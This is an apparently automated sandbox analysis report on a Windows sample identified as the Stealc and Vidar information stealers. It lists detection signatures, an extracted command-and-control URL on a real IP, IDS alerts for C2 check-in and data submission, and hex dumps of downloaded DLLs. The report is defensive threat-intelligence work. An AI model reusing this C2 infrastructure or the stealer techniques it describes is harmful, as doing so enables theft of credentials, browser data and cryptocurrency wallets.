Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1527287
MD5: 1e31ae89e90ab1a25e4d578b19154bd7
SHA1: 955ef96ad52954b6e2eff63b1a35694433e83d9b
SHA256: 85104c53c0061dd183981df87ad8744c85d8c8c6f044698a1ed98705edaf4117
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\KFCFBFHIEB.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Found malware configuration
Source: 11.2.Pct.pif.1e0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://45.145.4.234/ce4b71a59f4ee761.php", "Botnet": "default"}
Source: 11.2.Pct.pif.1e0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://45.145.4.234/ce4b71a59f4ee761.php", "Botnet": "default"}
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\KFCFBFHIEB.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 73%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 96.9% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC36C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 11_2_6CC36C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 103.6.198.219:443 -> 192.168.2.6:63886 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
Source: Binary string: nss3.pdb@ source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
Source: Binary string: softokn3.pdb@ source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
Source: Binary string: nss3.pdb source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
Source: Binary string: mozglue.pdb source: Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00C24005
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00C2C2FF
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2494A GetFileAttributesW,FindFirstFileW,FindClose, 11_2_00C2494A
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 11_2_00C2CD9F
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2CD14 FindFirstFileW,FindClose, 11_2_00C2CD14
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00C2F5D8
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00C2F735
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00C2FA36
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00C23CE2
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\627982 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\627982\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:63885 -> 45.145.4.234:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:63885 -> 45.145.4.234:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.145.4.234:80 -> 192.168.2.6:63885
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:63885 -> 45.145.4.234:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.145.4.234:80 -> 192.168.2.6:63885
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:63885 -> 45.145.4.234:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:63885 -> 45.145.4.234:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://45.145.4.234/ce4b71a59f4ee761.php
Source: Malware configuration extractor URLs: http://45.145.4.234/ce4b71a59f4ee761.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
